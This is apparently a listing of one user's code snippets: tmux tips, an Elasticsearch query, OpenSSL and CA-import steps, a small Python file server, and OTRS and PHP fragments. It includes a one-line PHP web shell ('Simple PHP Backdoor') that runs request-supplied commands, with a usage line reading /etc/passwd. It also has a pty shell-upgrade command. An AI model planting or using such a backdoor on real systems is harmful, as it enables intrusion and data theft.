kkirsche

tmux cheat sheet

(C-x means ctrl+x, M-x means alt+x)

Prefix key

The default prefix is C-b. If you (or your muscle memory) prefer C-a, you need to add this to ~/.tmux.conf:

remap prefix to Control + a

kkirsche

# simple match all query with term facet
ejs.Request()
    .indices("myindex")
    .types("mytype")
    .query(ejs.MatchAllQuery())
    .facet(
        ejs.TermsFacet('url')
            .field('url')
            .size(20))

kkirsche

#!/usr/bin/env ruby
# Full Contol on Ethnet, IP & TCP headers. Play with it ;)
# to test it: nc -lvp 4444
# as root: tcpdump  -nvvvv 'tcp port 4444' -i wlan0  # change wlan0 to your interface
# or use packetfu to monitor as tcpdump
## cap = PacketFu::Capture.new(:iface => 'wlan0' , :promisc=> true)
## cap.show_live(:filter => 'tcp and port 4444')
# libpcap should be installed
# gem install pcaprub packetfu

kkirsche

import sys, os, socket
s = socket.socket()
s.bind((sys.argv[1], int(sys.argv[2])))
s.listen(5)
try:
	while True:
		conn, addr = s.accept()
		path = os.path.join(os.getcwd(), "./"+conn.recv(4096).split("\n")[0].split(" ")[1])
		conn.send((open(path).read() if os.path.isfile(path) else reduce(lambda x,s:x+"\n"+s+("/" if os.path.isdir(s) else ""),sorted(os.listdir(path)),"Directory "+path+" ls")) if os.path.exists(path) else '404: '+path)
		conn.close()

kkirsche

# 1) Create your private key (any password will do, we remove it below)

$ cd ~/.ssh
$ openssl genrsa -des3 -out server.orig.key 2048


# 2) Remove the password

$ openssl rsa -in server.orig.key -out server.key

kkirsche

• Open a webpage that uses the CA with Firefox
• Click the lock-icon in the addressbar -> show information -> show certificate
• the certificate viewer will open
• click details and choose the certificate of the certificate-chain, you want to import to CentOS
• click "Export..." and save it as .crt file
• Copy the .crt file to /etc/pki/ca-trust/source/anchors on your CentOS machine
• run update-ca-trust extract
• test it with wget https://thewebsite.org

kkirsche

#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'

#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443

#base64 decode a string
echo STRINGTODECODE | base64 --decode

#escape jail shell

kkirsche

<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>

kkirsche

<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

kkirsche

<?php
// https://gist.github.com/magnetikonline/650e30e485c0f91f2f40

class DumpHTTPRequestToFile {

	public function execute($targetFile) {

		$data = sprintf(
			"%s %s %s\n\nHTTP headers:\n",
			$_SERVER['REQUEST_METHOD'],